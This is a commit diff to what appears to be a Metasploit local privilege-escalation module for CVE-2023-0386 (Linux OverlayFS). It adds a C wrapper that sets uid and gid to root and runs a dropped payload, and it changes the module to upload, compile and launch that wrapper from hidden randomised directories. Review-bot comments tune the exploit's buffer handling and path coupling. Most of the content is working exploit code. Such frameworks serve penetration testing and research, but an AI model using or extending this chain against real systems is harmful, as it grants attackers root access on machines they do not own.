
Commit 692531b

committed
Call payload directory
1 parent 2b63f8b commit 692531b


3 files changed

+30
-4
lines changed

3 files changed

+30
-4
lines changed
Binary file not shown.
Lines changed: 24 additions & 0 deletions
@@ -0,0 +1,24 @@
1+
#define _GNU_SOURCE
2+
#include <stdio.h>
3+
#include <stdlib.h>
4+
#include <string.h>
5+
#include <unistd.h>
6+
7+
int main(int argc, char const *argv[]) {
8+
char cwd[500];
9+
if (getcwd(cwd, sizeof(cwd)) == NULL) {
10+
perror("getcwd() error");
11+
return 1;
12+
}
13+
if (setuid(0) < 0) {
14+
perror("setuid");
15+
return -1;
16+
}
17+
18+
if (setgid(0) < 0) {
19+
perror("setgid");
20+
return -1;
21+
}
22+
system(strcat(cwd, "/payload"));
23+
return 0;
24+
}
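Review bot: `strcat(cwd, "/payload")` on new line 22 can write past the end of `cwd`, because getcwd() may fill all 500 bytes and the append needs eight more. Build the command in its own buffer with a bounded call instead: `char cmd[sizeof(cwd) + sizeof("/payload")];` followed by `snprintf(cmd, sizeof(cmd), "%s/payload", cwd);`, then pass `cmd` to system(). The return value of system() is discarded, so main returns 0 even when the command could not be started; propagating a non-zero status would make that failure visible to the caller. The file also lacks a header comment stating that it expects a file named `payload` in the current working directory.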

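--- a/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
+++ b/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
@@ -112,27 +112,28 @@ def exploit
 # Upload exploit executable
 exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
 exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+payload_wrapper_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
 
 mkdir(exploit_dir)
 register_dir_for_cleanup(exploit_dir)
 
 if live_compile?
 vprint_status('Live compiling exploit on system...')
 upload_and_compile(exploit_path, strip_comments(exploit_source('CVE-2023-0386', 'cve_2023_0386.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
+upload_and_compile(payload_wrapper_path, strip_comments(exploit_source('CVE-2023-0386', 'payload_wrapper.c')))
 else
 vprint_status('Dropping pre-compiled exploit on system...')
 upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
+upload_and_chmodx(payload_wrapper_path, exploit_data('CVE-2023-0386', 'payload_wrapper.x64.elf'))
 end
 
 # Upload payload executable
-payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+payload_path = "#{exploit_dir}/payload"
 upload_and_chmodx(payload_path, generate_payload_exe)
-# register payload for automatic cleanup
-register_file_for_cleanup(payload_path)
 
 # Launch exploit
 print_status('Launching exploit...')
-cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+cmd_string = "#{exploit_path} #{payload_wrapper_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
 vprint_status("Running: #{cmd_string}")
 begin
 output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])
@@ -145,4 +146,5 @@ def exploit
 cmd_exec("rm -rf '#{exploit_dir}'")
 end
 end
+
 end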
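Review bot: `payload_path = "#{exploit_dir}/payload"` on new line 131 has to match the `"/payload"` suffix that the new wrapper source appends to its working directory, and nothing at that line records the coupling. A rename on either side would leave the wrapper calling a path that does not exist, so I would add `# must stay in sync with the "/payload" suffix hard-coded in payload_wrapper.c` above the assignment. The wrapper resolves that path from getcwd(), and this hunk does not show where the working directory becomes `exploit_dir`; presumably the exploit binary changes into it, which a second comment should state. `def exploit` starts before the first hunk and its rescue/cleanup tail is only partly visible in the second.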
